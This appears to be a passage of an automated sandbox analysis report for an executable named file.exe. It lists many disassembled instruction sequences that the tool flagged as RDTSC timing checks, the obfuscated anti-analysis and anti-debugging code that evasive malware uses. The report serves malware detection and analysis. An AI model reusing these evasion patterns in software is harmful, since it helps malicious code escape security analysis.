                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD001 second address: 5BD06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 stc 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F96F8D16A18h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push ebx 0x00000027 mov dword ptr [ebp+122D25BEh], edx 0x0000002d pop edi 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F96F8D16A18h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a cmc 0x0000004b xchg eax, ebx 0x0000004c pushad 0x0000004d jne 00007F96F8D16A18h 0x00000053 push eax 0x00000054 push edx 0x00000055 jns 00007F96F8D16A16h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BD06A second address: 5BD076 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BE57A second address: 5BE57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BF07A second address: 5BF07E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BF07E second address: 5BF0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov di, ax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F96F8D16A18h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+12487323h] 0x0000002e push 00000000h 0x00000030 add si, 0DE6h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jl 00007F96F8D16A16h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BF0C2 second address: 5BF0DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F961C6B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5BFAFF second address: 5BFB05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C0578 second address: 5C0581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2257 second address: 5C226C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F8D16A1Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C226C second address: 5C2270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2270 second address: 5C2274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C2274 second address: 5C228E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F961C6B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C228E second address: 5C22CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F8D16A20h 0x00000007 jmp 00007F96F8D16A1Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jc 00007F96F8D16A1Ah 0x00000015 jmp 00007F96F8D16A1Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c jne 00007F96F8D16A16h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C22CE second address: 5C22D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5689A0 second address: 5689A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5689A8 second address: 5689AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5689AC second address: 5689B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C4A1C second address: 5C4A3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F961C6B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F96F961C6A8h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5ED7 second address: 5C5EE1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F96F8D16A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C5EE1 second address: 5C5EE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C64F2 second address: 5C64F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C7538 second address: 5C753E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C753E second address: 5C7542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C84C2 second address: 5C84C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C84C7 second address: 5C84CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C9678 second address: 5C968E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F961C6B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CB620 second address: 5CB69A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F96F8D16A20h 0x00000008 jmp 00007F96F8D16A1Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F96F8D16A25h 0x00000015 nop 0x00000016 mov ebx, dword ptr [ebp+122D225Ch] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F96F8D16A18h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Ch 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a sub dword ptr [ebp+122D297Ch], edi 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F96F8D16A28h 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC732 second address: 5CC7C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F961C6B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F96F961C6B4h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F96F961C6A8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b jmp 00007F96F961C6B8h 0x00000030 push 00000000h 0x00000032 xor ebx, 3CBA83F3h 0x00000038 push 00000000h 0x0000003a call 00007F96F961C6B0h 0x0000003f xor bx, A432h 0x00000044 pop edi 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push esi 0x0000004a pop esi 0x0000004b jg 00007F96F961C6A6h 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC7C4 second address: 5CC7CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC7CB second address: 5CC7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F96F961C6B0h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC7E5 second address: 5CC7EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8691 second address: 5C86A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C86A0 second address: 5C86A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C86A5 second address: 5C86AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD534 second address: 5CD5A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F96F8D16A18h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jmp 00007F96F8D16A1Ah 0x00000028 push 00000000h 0x0000002a mov ebx, dword ptr [ebp+122D38AAh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F96F8D16A18h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c sub dword ptr [ebp+122D2845h], ecx 0x00000052 add edi, 05856346h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD5A7 second address: 5CD5AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD5AB second address: 5CD5BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F8D16A1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CE4BD second address: 5CE513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F96F961C6B0h 0x00000008 jng 00007F96F961C6A6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 add dword ptr [ebp+122D2947h], ebx 0x00000018 push 00000000h 0x0000001a movsx ebx, cx 0x0000001d push 00000000h 0x0000001f sub dword ptr [ebp+12486746h], edi 0x00000025 push eax 0x00000026 pushad 0x00000027 pushad 0x00000028 jmp 00007F96F961C6B8h 0x0000002d jne 00007F96F961C6A6h 0x00000033 popad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA939 second address: 5CA956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F8D16A23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF40C second address: 5CF41B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96F961C6ABh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF41B second address: 5CF494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F8D16A25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, dword ptr [ebp+122D2287h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F96F8D16A18h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov dword ptr [ebp+12482784h], esi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F96F8D16A18h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 mov dword ptr [ebp+122D2998h], ebx 0x00000056 xchg eax, esi 0x00000057 push esi 0x00000058 pushad 0x00000059 push eax 0x0000005a pop eax 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF494 second address: 5CF4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF4A0 second address: 5CF4AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD810 second address: 5CD81A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F96F961C6A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD81A second address: 5CD81E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CD81E second address: 5CD847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jne 00007F96F961C6B7h 0x00000010 jp 00007F96F961C6ACh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D1CFE second address: 5D1D05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2BFF second address: 5D2C04 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2C04 second address: 5D2C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D2503h], edx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ebx, esi 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007F96F8D16A18h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a mov bl, 6Fh 0x0000003c mov eax, dword ptr [ebp+122D14C5h] 0x00000042 mov dword ptr [ebp+122D21ADh], esi 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F96F8D16A18h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 nop 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F96F8D16A26h 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2C8B second address: 5D2C91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2C91 second address: 5D2C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2C95 second address: 5D2CBF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F96F961C6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F96F961C6BBh 0x00000015 jmp 00007F96F961C6B5h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D2CBF second address: 5D2CCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F96F8D16A16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3DB5 second address: 5D3DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3DB9 second address: 5D3DC3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F96F8D16A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3DC3 second address: 5D3DE5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F96F961C6ACh 0x00000008 jns 00007F96F961C6A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F96F961C6ABh 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D3DE5 second address: 5D3DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F96F8D16A16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF5CD second address: 5CF651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F96F961C6A8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D221Eh], eax 0x00000027 push dword ptr fs:[00000000h] 0x0000002e xor dword ptr [ebp+122D217Bh], eax 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F96F961C6A8h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000015h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 push edx 0x00000056 adc di, A0DFh 0x0000005b pop edi 0x0000005c adc di, A38Dh 0x00000061 mov eax, dword ptr [ebp+122D147Dh] 0x00000067 mov bx, B71Eh 0x0000006b push FFFFFFFFh 0x0000006d mov edi, dword ptr [ebp+122D38EAh] 0x00000073 nop 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF651 second address: 5CF658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6C58 second address: 5D6C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6C5D second address: 5D6C67 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F96F8D16A1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE5D5 second address: 5DE5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F961C6B8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1A75 second address: 5E1A89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F96F8D16A1Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E6E91 second address: 5E6ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F96F961C6AEh 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 jmp 00007F96F961C6B2h 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F96F961C6AAh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E7063 second address: 5E70A7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F96F9355818h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jng 00007F96F935581Ch 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push esi 0x0000001e pushad 0x0000001f jp 00007F96F9355816h 0x00000025 jg 00007F96F9355816h 0x0000002b popad 0x0000002c pop esi 0x0000002d mov eax, dword ptr [eax] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F96F9355823h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E70A7 second address: 5E70BD instructions: 0x00000000 rdtsc 0x00000002 js 00007F96F91F29A8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC12B second address: 5EC130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC130 second address: 5EC144 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F96F91F29A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC304 second address: 5EC30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F96F9355816h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC30F second address: 5EC315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC315 second address: 5EC31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F96F9355816h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC31F second address: 5EC323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC323 second address: 5EC329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC496 second address: 5EC49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
